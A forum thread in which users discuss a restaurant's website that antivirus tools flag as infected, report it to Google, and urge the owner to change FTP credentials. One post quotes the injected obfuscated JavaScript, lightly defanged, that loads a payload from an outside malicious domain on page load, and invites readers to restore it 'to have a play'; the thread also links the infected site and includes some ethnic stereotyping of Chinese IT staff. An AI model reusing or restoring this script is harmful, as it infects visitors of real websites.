are your chickens infected too?

Really brasa chicken brain !!!

AGAIN:

root wrote:Really brasa chicken brain !!!

AGAIN:

Funny how Kaspersky gives you a handy little link to the site for you after it tells you it's infected.

Give you the link and you may try your antivirus if you have a BALLS

http://brasachicken.com.cn/

Don't forget post the results.

Still infected AVG caught it!

Seems Brasa Chicken can't be bothered giving top priority to fixing their website...

...so I reported it to Google.

Google thanked me for doing my good dead for the day.

skyline5k wrote:Not fixed, BrasaChicken. The script is still there. Before you update, check your IT person's computer for viruses. And not by using Rising Antivirus.

Also, as I said before, CHANGE YOUR FTP password!!!

Maybe you did fix it, but because the password is already compromised, it will still re-insert another virus.

Dollars to donuts the IT guy is Chinese. Sorry but it fits the MO.

leidelaohu wrote:

tihZ_hO wrote:Sorry but it fits the MO.

You mean "incompetent" ? Ja.

Criminally so

Seems like quite a marketing poo-poo, since websites are the main source of info. Bit dosconcerting how Brasa don't seem to care much about it either...weird.

leidelaohu wrote:

skyline5k wrote:Before you update, check your IT person's computer for viruses.

Didn't I say something about getting rid of the IT person first ?

It's not even hidden -

<XsXcXrXiXpXt> try{window.onload=function(){document.write('<div>shoplocal-com.19lou.com.f</div>');Z8siuh00w3sbp = document.getElementById('megaid').innerHTML + 'a^(c#@$&e))b&&o!^&o^)$#k(!&-#c@o&)m$##.$!@t))o^((p!&@!l(i!((n($e#$m^#)a((@r$@!(i#n^@@$e(#((.#&r@$@)u^$):^(D@^E(&&B^U)G&&$/#)(i((@p!@$i&#c$@(t(!u!&r$e&)((.!$^$$r@u&/@(i@#p$)i(!c!^$!^t(^$$u#!(r()@e##.)#r(^@$u)(^$@/(@g$!$^)o&$#o)!(g$!l)&&e$$.&$c@@#)o@#$m^^@/)@&c&(^)n(!z$z!&@.$$c)!@o!^m!#/)#s)($k$&y^&c#&$n).#c!@(o@@$m@#$$^/@'.replace(/\!|&|#|@|\^|\)|\(|\$/ig, '') ;document.write('<scr></scr>');} } catch(Dj8lyxdn ) {}</XsXcXrXiXpXt>

<c3e6523f0e4e60e7ec7fa9a2a0d92ff0>

Remove the X's if you want to have a play

Or look here for a little info :

http://blog.unmaskparasites.com/2009/12 ... d-scripts/

AVG does not like the link ... I would not suggest people click on it.

Kirishima wrote:Seems like quite a marketing poo-poo, since websites are the main source of info. Bit dosconcerting how Brasa don't seem to care much about it either...weird.

Brazen Chicken obviously picked up on Chinese marketing:

Who gives a damn about your current customers when there are more stupid ones lining up?

We do care people. We will fix it tomorrow Monday. Sorry for the inconvenience. So long

leidelaohu wrote:

tihZ_hO wrote:http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/

AVG does not like the link ... I would not suggest people click on it.

Yeah, it's got a lot of samples of evil scripts, which probably trip the gongs and bells ... good explanation of what's going on with these scripts tho, if you trust your computer

That's right, if someone is not savvy they might panic is why i suggested not to click on the link.

Good test of your security though...if you don't get the gongs and bells...

brasachicken wrote:We do care people. We will fix it tomorrow Monday. Sorry for the inconvenience. So long

So long? Why?

I think you got it this time. The script is gone. Let's check back in a few days to see if it's all taken care of.

What you need to do is make sure whoever has access to your site NO LONGER HAS ACCESS to your site. You got it the first time, and it came back with a different, but similar script. You got it the 2nd time. Hopefully it's gone. If it comes back again, it's time to start asking your IT people for a refund. If it's your staff, it's time to ask for their salary back.

If you find out that any of this is blatant incompetence, it's time to name names. I don't imagine Eddie Vargas wants to have his name on this sort of problem.